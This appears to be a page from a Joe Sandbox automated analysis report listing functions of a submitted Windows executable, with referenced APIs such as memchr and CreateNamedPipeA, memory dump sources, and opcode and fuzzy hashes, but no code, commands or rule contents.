Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: memchr
String ID:
API String ID: 3297308162-0
Opcode ID: 7fada50cd1e76dfd6fbefd7d3196940bec76c4c03ae0c86720d4e54f8f0e2230
Instruction ID: c623e75e62fc229a8acfc3d35b45a5a3ca4a473b413e5845dbe748a8ee1eba98
Opcode Fuzzy Hash: 7fada50cd1e76dfd6fbefd7d3196940bec76c4c03ae0c86720d4e54f8f0e2230
Instruction Fuzzy Hash: 7B120573A08B8099DB25DB29E04032FBB60F789794F246127DBD947BA5DB7DC489CB04

Uniqueness

Uniqueness Score: -1.00%

Function 0043E2F0 Relevance: 1.8, APIs: 1, Instructions: 504COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 0043E5E8

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: memchr
String ID:
API String ID: 3297308162-0
Opcode ID: 046e6cb38396474b396f66d1f52558088bd67553247f592d80db059a9fd1fd57
Instruction ID: f3ef2a114a5a0e106a3ac157fde15d09e4d725848ccf83dfc26df852d99155a2
Opcode Fuzzy Hash: 046e6cb38396474b396f66d1f52558088bd67553247f592d80db059a9fd1fd57
Instruction Fuzzy Hash: D912133360AB8085DB21DB2AE04032FBB61F789798F641517EB8A47BE5DB7DC485CB04

Uniqueness

Uniqueness Score: -1.00%

Function 0049BB29 Relevance: 1.8, Strings: 1, Instructions: 502COMMON

Download Yara Rule

Strings

basic_string::append, xrefs: 0049BF01

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: basic_string::append
API String ID: 0-3811946249
Opcode ID: eb09ef1f981a9f25bc7d3c69a2301c4929bda09fee129fe165f97a9195044fa3
Instruction ID: 0eccdb91635933ed559f3405c4eadc675170ceb4dc14f9ec65ce90f99b4979c9
Opcode Fuzzy Hash: eb09ef1f981a9f25bc7d3c69a2301c4929bda09fee129fe165f97a9195044fa3
Instruction Fuzzy Hash: 32029B26701B4481CF249B6AE68536E2B61F789FD8F548527DF4E077A9DF3CC8428388

Uniqueness

Uniqueness Score: -1.00%

Function 0040F5A0 Relevance: 1.7, APIs: 1, Instructions: 241COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0040F743

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 354de8566b7bebe6d537cbfa1d2607641a38ef6db3e3c54bbe9e603ae0b51125
Instruction ID: cfd906bc04f53eb73a70fd25352a2e4296b3cbf7ab6271c3272e0723d54aac43
Opcode Fuzzy Hash: 354de8566b7bebe6d537cbfa1d2607641a38ef6db3e3c54bbe9e603ae0b51125
Instruction Fuzzy Hash: 1C81C6333142408ADB34DE26D90076B76A2F7C4B88F14903AEE47ABF99DB3CD8458B45

Uniqueness

Uniqueness Score: -1.00%

Function 00430220 Relevance: 1.6, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00430548

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: wcslen
String ID:
API String ID: 4088430540-0
Opcode ID: ad48f945fa8b6daab52bace76ebd2c01703ba448644350f734231cfd9fc65f3f
Instruction ID: 358ad6804a3aea58aa7babb0a2751a4314a682054156ea0abb18f3865ceb8f31
Opcode Fuzzy Hash: ad48f945fa8b6daab52bace76ebd2c01703ba448644350f734231cfd9fc65f3f
Instruction Fuzzy Hash: CCC18D32B01B54CADB24CFA9C4602AE3371FB58B98F556613DE4D177A8DB78C892C308

Uniqueness

Uniqueness Score: -1.00%

Function 0042C670 Relevance: 1.6, APIs: 1, Instructions: 300stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0042C9D8

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: e027792236a3505e6f7532b57ff0411fc977353c62c9ec1d23b36e8ecec3093f
Instruction ID: ca8fae37368098a4e56c17cf898297325ae94cf69d9c70a8a6c3dfdaa796f0eb
Opcode Fuzzy Hash: e027792236a3505e6f7532b57ff0411fc977353c62c9ec1d23b36e8ecec3093f
Instruction Fuzzy Hash: 41B1E333B00A60C9DB24DF79E4C02AE3761F755BA8BA48617DE2E57794DB78C886C344

Uniqueness

Uniqueness Score: -1.00%

Function 0045A520 Relevance: 1.5, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

-, xrefs: 0045B4C5

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: e5db42a19dc0f7341846a5d80777d5704ad1e50e93c2b260cf5ffa079512c8d7
Instruction ID: e73766af570d2393ee630bc139ee4fa6f612b443272d8b58f9ff4c74b0d71afc
Opcode Fuzzy Hash: e5db42a19dc0f7341846a5d80777d5704ad1e50e93c2b260cf5ffa079512c8d7
Instruction Fuzzy Hash: 14D13732209B8485DB349B2AE44039EB7A0F785B85F548217DF8D47B6ADF3CC499CB46

Uniqueness

Uniqueness Score: -1.00%

Function 004594F0 Relevance: 1.5, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

-, xrefs: 0045A495

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: a10b5ddfde4f18bbd7410cc04c0d0521696dbbabeeb15ccfd32cff3171e0ffef
Instruction ID: 4d580016bbf999cd1e8a71f7fc097d28462f7131430a3e4712ec7eaae516c19d
Opcode Fuzzy Hash: a10b5ddfde4f18bbd7410cc04c0d0521696dbbabeeb15ccfd32cff3171e0ffef
Instruction Fuzzy Hash: F8D15732209B84C5DB209B26E44439EB7A0F785B88F54411BDF8D47B6ADF7CC899CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00458180 Relevance: 1.5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

Strings

-, xrefs: 00459084

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: a3d4be3bce3aeffe73d8d0a7dc9b90c127e5e30934d35bc9e6f8df058e0b83cd
Instruction ID: e82c96a2720bce6c1e8ed2bcd0a172c6159e2edb76ca199427b1e2e396522040
Opcode Fuzzy Hash: a3d4be3bce3aeffe73d8d0a7dc9b90c127e5e30934d35bc9e6f8df058e0b83cd
Instruction Fuzzy Hash: E9D14632209BC085DB20CB26E0443ABB7A1F785B95F54412ADF9D57BAADF3DC449CB05

Uniqueness

Uniqueness Score: -1.00%

Function 00457230 Relevance: 1.5, Strings: 1, Instructions: 285COMMON

Download Yara Rule

Strings

-, xrefs: 004580F5

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ed09bf8a85958d444b82556cdc8c6d0b5eaa3f972f524f36c732f67bbffc1bbe
Instruction ID: 2e783e94ad34bc9ff2d28ab668b5d2dec257d0d134f7268bf546e7a03ae10780
Opcode Fuzzy Hash: ed09bf8a85958d444b82556cdc8c6d0b5eaa3f972f524f36c732f67bbffc1bbe
Instruction Fuzzy Hash: 5AC14532209B8085DB20CB26F44439BB7A1F785B95F544126DF9D47BAADF3DC489CB05

Uniqueness

Uniqueness Score: -1.00%

Function 03A6FC2C Relevance: 1.5, APIs: 1, Instructions: 33pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32 ref: 03A6FC96

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: CreateNamedPipe
String ID:
API String ID: 2489174969-0
Opcode ID: 2afce34525619b0311733d8307f7bcdb1160627dda8c8969539f2a85fa4d871d
Instruction ID: 0934aae305681c71c521a138c3f2f7ee5d2e468f1c3dbac1c613af22560f9b66
Opcode Fuzzy Hash: 2afce34525619b0311733d8307f7bcdb1160627dda8c8969539f2a85fa4d871d
Instruction Fuzzy Hash: 3001DF72610F458AEB12CB10F844359B7A4F79A339F044719D6EC067D8EB7CC218DB01

Uniqueness

Uniqueness Score: -1.00%

Function 00412350 Relevance: 1.5, Strings: 1, Instructions: 213COMMON

Download Yara Rule

Strings

O, xrefs: 004123F1

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: O
API String ID: 0-878818188
Opcode ID: 4e8587bd9e0d8ce64d61065359589c1b81f06e3e3cf4d626fa49e26d5a1f4268
Instruction ID: 3194b002934bf74e63e66a3121828da74afc736b7cd80a04a1f693468a1407ea
Opcode Fuzzy Hash: 4e8587bd9e0d8ce64d61065359589c1b81f06e3e3cf4d626fa49e26d5a1f4268
Instruction Fuzzy Hash: 4661243371425082EB298F35A6117EB72A1FB9079CF449127DE4AC6784F7BDC9A2C309

Uniqueness

Uniqueness Score: -1.00%

Function 004982E0 Relevance: 1.4, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

basic_ios::clear, xrefs: 00498310

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: basic_ios::clear
API String ID: 0-82543608
Opcode ID: 9931c538fa9f707754012b5e0687e29b2d34fd830892b08645679adb2bf8fb44
Instruction ID: bd42627be2b6349ac6afdc92b808e718d6a39825c33eb4589a092118aaa257ff
Opcode Fuzzy Hash: 9931c538fa9f707754012b5e0687e29b2d34fd830892b08645679adb2bf8fb44
Instruction Fuzzy Hash: 0D61ABB23016809ADF18DF2AD5403AE6B60F746B98F18853ADF0A0B755DF3CD496C358

Uniqueness

Uniqueness Score: -1.00%

Function 00498C50 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

basic_ios::clear, xrefs: 00498C80

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: basic_ios::clear
API String ID: 0-82543608
Opcode ID: 20e93c2f8763cce509b9a3b1e9bc1c48caee3e48fb2d1a9132df8c482fd309c0
Instruction ID: 7650e3b94886e89caa2c0c30f88383ca115487c927c9911d6dcd8f41d780cfff
Opcode Fuzzy Hash: 20e93c2f8763cce509b9a3b1e9bc1c48caee3e48fb2d1a9132df8c482fd309c0
Instruction Fuzzy Hash: A851DC727026808ADF18DF2AD5507AE7B61F746B88F18863ADF0A47755CF38D462C368

Uniqueness

Uniqueness Score: -1.00%

Function 00491680 Relevance: 1.3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

Strings

basic_string::_M_create, xrefs: 004916E0

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: basic_string::_M_create
API String ID: 0-3122258987
Opcode ID: 9af5e91695d186ba411baed004616c67d203f492cb0b3fef1e90418797b73d0a
Instruction ID: 22305e61b9c5c7c586b570411558ceea50e1ddd707e8fe4689f0e119a0106897
Opcode Fuzzy Hash: 9af5e91695d186ba411baed004616c67d203f492cb0b3fef1e90418797b73d0a
Instruction Fuzzy Hash: D4F020A2F4230183CD189F4284B033D59A09363BB4F584733862A1B3A0ED5C88E2434E

Uniqueness

Uniqueness Score: -1.00%

Function 0048ED30 Relevance: 1.3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

Strings

basic_string::_M_create, xrefs: 0048ED90

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: basic_string::_M_create
API String ID: 0-3122258987
Opcode ID: a4439e866bdd6fb7da16ff2008345f75e6fdca1eb17fc84ed9eaec3606e8dfa2
Instruction ID: b86936a810b9fda07d93eaf8a7e425fc4ffc0235f0646f18bcc8c7f395558580
Opcode Fuzzy Hash: a4439e866bdd6fb7da16ff2008345f75e6fdca1eb17fc84ed9eaec3606e8dfa2
Instruction Fuzzy Hash: 57F0A0B2F12704C1DE19AF46947133C62E4A323764FA04B03C63A233D1DA1D81E6834E

Uniqueness

Uniqueness Score: -1.00%

Function 00446CE0 Relevance: .7, Instructions: 653COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6472033492e94534e37b918bb8d71ed4f39030c307efb9567e918ba3c02647e4
Instruction ID: 343e354684f15b20a57c35d147598b71c058984cc7cdfbb4b832f431feeaff45
Opcode Fuzzy Hash: 6472033492e94534e37b918bb8d71ed4f39030c307efb9567e918ba3c02647e4
Instruction Fuzzy Hash: 3B42D82660CB8085FB248F29E04036BBBA1F781B54F644507DBD907BA5DB7DC487DB49

Uniqueness

Uniqueness Score: -1.00%

Function 00444AD0 Relevance: .6, Instructions: 650COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e77d8c65b7a06daff10dd54386bd8e9edbfc80331c1db5f3d96b87d110e3e88
Instruction ID: c958385108f31f0e10b32d66f5a28724ca46b81056826799a81e9f1a4a2883a7
Opcode Fuzzy Hash: 7e77d8c65b7a06daff10dd54386bd8e9edbfc80331c1db5f3d96b87d110e3e88
Instruction Fuzzy Hash: 8642A636608B8086EF258F29E04036BBB61F7C1B44F644507EBDA07BA5DB7DC486DB49

Uniqueness

Uniqueness Score: -1.00%

Function 00443380 Relevance: .6, Instructions: 648COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6114f1166d57edc6c63d31b41b9673bb2f1e794c0a9d333b0e1244a44dbeb0ff
Instruction ID: 4a9b3b99eac5351f81aab92647ee7b88f98fa43abbce06220dd966a6cfb754cc
Opcode Fuzzy Hash: 6114f1166d57edc6c63d31b41b9673bb2f1e794c0a9d333b0e1244a44dbeb0ff
Instruction Fuzzy Hash: B742C262208B8085EB259F29E08036FBB61F781F45F644507EBDA07BA4DB7DC586CB09

Uniqueness

Uniqueness Score: -1.00%

Function 00445660 Relevance: .6, Instructions: 632COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92b15e6af3d286e84c45fb25a61d4ec229d3e6a1da8a25be00e00729bb2b29e2
Instruction ID: b8c41a64e455bcde3beff2f0140f71e0ef6f94ed408845761034f77dde400a93
Opcode Fuzzy Hash: 92b15e6af3d286e84c45fb25a61d4ec229d3e6a1da8a25be00e00729bb2b29e2
Instruction Fuzzy Hash: 3742A266208F84C6EF248F29E04036BBB61F786B44F648117EBDA07BA6DB7DC485D705

Uniqueness

Uniqueness Score: -1.00%

